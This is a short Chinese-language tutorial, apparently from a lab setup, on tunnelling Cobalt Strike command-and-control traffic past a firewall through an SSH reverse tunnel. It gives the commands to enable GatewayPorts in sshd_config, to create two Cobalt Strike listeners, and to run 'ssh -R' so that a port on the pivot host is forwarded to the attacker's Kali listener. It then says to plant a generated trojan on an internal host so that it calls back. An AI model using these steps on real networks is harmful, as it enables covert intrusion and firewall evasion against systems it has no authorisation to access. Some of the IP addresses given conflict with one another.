CobaltStrike（cs）绕过防火墙之通过SSH隧道上线

预览

环境配置

`# 环境``kali   NAT 192.168.220.189``centos NAT 192.168.220.14`       `v4  192.168.22.136``win7   v4  192.168.22.12``   ``   ``centos7.6添加vm4网卡方便与二层主机通讯，自动获取ip即可。`

CS-SSH隧道上线

默认情况下，SSH守护程序只侦听127.0.0.1，所以我们将无法从外部访问我们转发的端口。

`要让它在连接到Internet的接口上侦听，我们必须在SSH服务器的配置中启用GatewayPorts选项。``[root@rsec ~]# vim /etc/ssh/sshd_config``GatewayPorts yes``或者``[root@rsec ~]# sed -i s/"#GatewayPorts no"/"GatewayPorts yes"/g /etc/ssh/sshd_config`

`# cs创建监2个监听器``kali-8000    192.168.220.189 8000 #用于上线``centos-8080  192.168.22.136 8080 #用于生成木马`

`   ``   ``# kali中连接中转主机将centos中主机的8080端口转发到我们kali本地的80000端口``ssh -R cs上线ip:8080:kali本机使用0代替:8000 root@中间机ip -vN``   ``   ``└─# ssh -R 192.168.22.132:8080:0.0.0.0:8000 root@192.168.220.145 -vN``   ``   ``# 上述转发成功后，在centos中转机查看开发的端口，发现8080已经开放``[root@rsec ~]# netstat -pantu | grep 8080`

# 生成木马选择centos-8080监听器，并将木马放入2层主机进行上线